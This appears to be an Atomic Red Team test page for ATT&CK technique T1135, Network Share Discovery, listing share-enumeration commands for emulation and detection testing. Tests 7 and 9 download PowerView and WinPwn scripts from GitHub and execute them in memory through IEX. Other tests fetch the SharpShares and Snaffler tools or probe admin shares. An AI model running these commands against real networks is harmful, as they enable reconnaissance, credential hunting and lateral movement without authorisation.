# T1135 - Network Share Discovery

## Description from ATT&CK

> Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
> 
> File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the <code>net view \\\\remotesystem</code> command. It can also be used to query shared drives on the local system using <code>net share</code>. For macOS, the <code>sharing -l</code> command lists all shared points used for smb services.

[Source](https://attack.mitre.org/techniques/T1135)

## Atomic Tests

- [Atomic Test #1: Network Share Discovery](#atomic-test-1-network-share-discovery)
- [Atomic Test #2: Network Share Discovery - linux](#atomic-test-2-network-share-discovery---linux)
- [Atomic Test #3: Network Share Discovery - FreeBSD](#atomic-test-3-network-share-discovery---freebsd)
- [Atomic Test #4: Network Share Discovery command prompt](#atomic-test-4-network-share-discovery-command-prompt)
- [Atomic Test #5: Network Share Discovery PowerShell](#atomic-test-5-network-share-discovery-powershell)
- [Atomic Test #6: View available share drives](#atomic-test-6-view-available-share-drives)
- [Atomic Test #7: Share Discovery with PowerView](#atomic-test-7-share-discovery-with-powerview)
- [Atomic Test #8: PowerView ShareFinder](#atomic-test-8-powerview-sharefinder)
- [Atomic Test #9: WinPwn - shareenumeration](#atomic-test-9-winpwn---shareenumeration)
- [Atomic Test #10: Network Share Discovery via dir command](#atomic-test-10-network-share-discovery-via-dir-command)
- [Atomic Test #11: Enumerate All Network Shares with SharpShares](#atomic-test-11-enumerate-all-network-shares-with-sharpshares)
- [Atomic Test #12: Enumerate All Network Shares with Snaffler](#atomic-test-12-enumerate-all-network-shares-with-snaffler)

### Atomic Test #1: Network Share Discovery

Network Share Discovery

**Supported Platforms:** macOS

**auto_generated_guid:** `f94b5ad9-911c-4eff-9718-fd21899db4f7`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | Computer name to find a mount on. | string | computer1|

#### Attack Commands: Run with `sh`!

```sh
df -aH
smbutil view -g //#{computer_name}
showmount #{computer_name}
```

### Atomic Test #2: Network Share Discovery - linux

Network Share Discovery using smbstatus

**Supported Platforms:** Linux

**auto_generated_guid:** `875805bc-9e86-4e87-be86-3a5527315cae`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| package_checker | Package checking command. Debian - dpkg -s samba | string | (rpm -q samba &>/dev/null) || (dpkg -s samba | grep -q installed)|
| package_installer | Package installer command. Debian - apt install samba | string | (which yum && yum -y install epel-release samba)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y samba)|

#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)

```bash
smbstatus --shares
```


#### Dependencies: Run with `bash`!

##### Description: Package with smbstatus (samba) must exist on device

###### Check Prereq Commands

```bash
if #{package_checker} > /dev/null; then exit 0; else exit 1; fi
```

###### Get Prereq Commands

```bash
#{package_installer}
```

### Atomic Test #3: Network Share Discovery - FreeBSD

Network Share Discovery using smbstatus

**Supported Platforms:** Linux

**auto_generated_guid:** `77e468a6-3e5c-45a1-9948-c4b5603747cb`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| package_checker | Package checking command. pkg info -x samba | string | (pkg info -x samba &>/dev/null)|
| package_installer | Package installer command. pkg install -y samba413 | string | (which pkg && pkg install -y samba413)|

#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)

```sh
smbstatus --shares
```


#### Dependencies: Run with `sh`!

##### Description: Package with smbstatus (samba) must exist on device

###### Check Prereq Commands

```sh
if #{package_checker} > /dev/null; then exit 0; else exit 1; fi
```

###### Get Prereq Commands

```sh
#{package_installer}
```

### Atomic Test #4: Network Share Discovery command prompt

Network Share Discovery utilizing the command prompt. The computer name variable may need to be modified to point to a different host
Upon execution available network shares will be displayed in the powershell session

**Supported Platforms:** Windows

**auto_generated_guid:** `20f1097d-81c1-405c-8380-32174d493bbb`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | Computer name to find a mount on. | string | localhost|

#### Attack Commands: Run with `command_prompt`!

```cmd
net view \\#{computer_name}
```

### Atomic Test #5: Network Share Discovery PowerShell

Network Share Discovery utilizing PowerShell. The computer name variable may need to be modified to point to a different host
Upon execution, available network shares will be displayed in the powershell session

**Supported Platforms:** Windows

**auto_generated_guid:** `1b0814d1-bb24-402d-9615-1b20c50733fb`

#### Attack Commands: Run with `powershell`!

```powershell
get-smbshare
```

### Atomic Test #6: View available share drives

View information about all of the resources that are shared on the local computer Upon execution, available share drives will be displayed in the powershell session

**Supported Platforms:** Windows

**auto_generated_guid:** `ab39a04f-0c93-4540-9ff2-83f862c385ae`

#### Attack Commands: Run with `command_prompt`!

```cmd
net share
```

### Atomic Test #7: Share Discovery with PowerView

Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed.

**Supported Platforms:** Windows

**auto_generated_guid:** `b1636f0a-ba82-435c-b699-0d78794d8bfd`

#### Attack Commands: Run with `powershell`!

```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose
```


#### Dependencies: Run with `powershell`!

##### Description: Endpoint must be joined to domain

###### Check Prereq Commands

```powershell
if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain) {exit 0} else {exit 1}
```

###### Get Prereq Commands

```powershell
"Join system to domain"
```

### Atomic Test #8: PowerView ShareFinder

PowerView is a PowerShell tool to gain network situational awareness on Windows domains. ShareFinder finds (non-standard) shares on machines in the domain.

**Supported Platforms:** Windows

**auto_generated_guid:** `d07e4cc1-98ae-447e-9d31-36cb430d28c4`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| parameters | ShareFinder parameter | string | -CheckShareAccess|

#### Attack Commands: Run with `powershell`!

```powershell
Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1"
Invoke-ShareFinder #{parameters}
```


#### Dependencies: Run with `powershell`!

##### Description: Invoke-ShareFinder module must exist in %TEMP% directory

###### Check Prereq Commands

```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1") {exit 0} else {exit 1}
```

###### Get Prereq Commands

```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/darkoperator/Veil-PowerView/8784e33f17ee7543ba2f45e27dc5f08ea3a1b856/PowerView/powerview.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1"
```

### Atomic Test #9: WinPwn - shareenumeration

Network share enumeration using the shareenumeration function of WinPwn

**Supported Platforms:** Windows

**auto_generated_guid:** `987901d1-5b87-4558-a6d9-cffcabc638b8`

#### Attack Commands: Run with `powershell`!

```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
shareenumeration -noninteractive -consoleoutput
```

### Atomic Test #10: Network Share Discovery via dir command

Network Share Discovery utilizing the dir command prompt. The computer ip variable may need to be modified to point to a different host ip
Upon execution available network shares will be displayed in the commandline session

**Supported Platforms:** Windows

**auto_generated_guid:** `13daa2cf-195a-43df-a8bd-7dd5ffb607b5`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_ip | Computer IP to find a mount on. | string | 127.0.0.1|

#### Attack Commands: Run with `command_prompt`!

```cmd
dir \\#{computer_ip}\c$
dir \\#{computer_ip}\admin$
dir \\#{computer_ip}\IPC$
```

### Atomic Test #11: Enumerate All Network Shares with SharpShares

SharpShares is a command line tool that can be integrated with Cobalt Strike's execute-assembly module, allowing for the enumeration of network shares. 
This technique has been utilized by various ransomware groups, including BianLian.
[Reference](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-136a)

**Supported Platforms:** Windows

**auto_generated_guid:** `d1fa2a69-b0a2-4e8a-9112-529b00c19a41`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_path | File to output enumeration results to | String | $env:temp&#92;T1135SharpSharesOutput.txt|
| sharp_path | Path to the SharpShares executable | String | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;SharpShares.exe|

#### Attack Commands: Run with `powershell`!

```powershell
cmd /c '#{sharp_path}' /ldap:all | out-file -filepath "#{output_path}"
```

#### Cleanup Commands

```powershell
remove-item "#{output_path}" -force -erroraction silentlycontinue
```

#### Dependencies: Run with `powershell`!

##### Description: The SharpShares executable must exist on disk

###### Check Prereq Commands

```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\SharpShares.exe") {exit 0} else {exit 1}
```

###### Get Prereq Commands

```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/mitchmoser/SharpShares/releases/download/v2.4/SharpShares.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\SharpShares.exe"
```

### Atomic Test #12: Enumerate All Network Shares with Snaffler

Snaffler is an open-source tool that has been used by various threat groups, including Scattered Spider/Muddled Libra, to enumerate accessible shares and credential-containing files within a domain. 
[Reference](https://unit42.paloaltonetworks.com/muddled-libra/)

**Supported Platforms:** Windows

**auto_generated_guid:** `b19d74b7-5e72-450a-8499-82e49e379d1a`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_path | File to output enumeration results to | String | $env:temp&#92;T1135SnafflerOutput.txt|
| snaffler_path | Path to the Snaffler executable | String | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;Snaffler.exe|

#### Attack Commands: Run with `powershell`!

```powershell
invoke-expression 'cmd /c start powershell -command { cmd /c "#{snaffler_path}" -a -o "#{output_path}" }; start-sleep 90; stop-process -name "snaffler"'
```

#### Cleanup Commands

```powershell
remove-item "#{output_path}" -force -erroraction silentlycontinue
```

#### Dependencies: Run with `powershell`!

##### Description: The Snaffler executable must exist on disk

###### Check Prereq Commands

```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\Snaffler.exe") {exit 0} else {exit 1}
```

###### Get Prereq Commands

```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/SnaffCon/Snaffler/releases/download/1.0.150/Snaffler.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Snaffler.exe"
```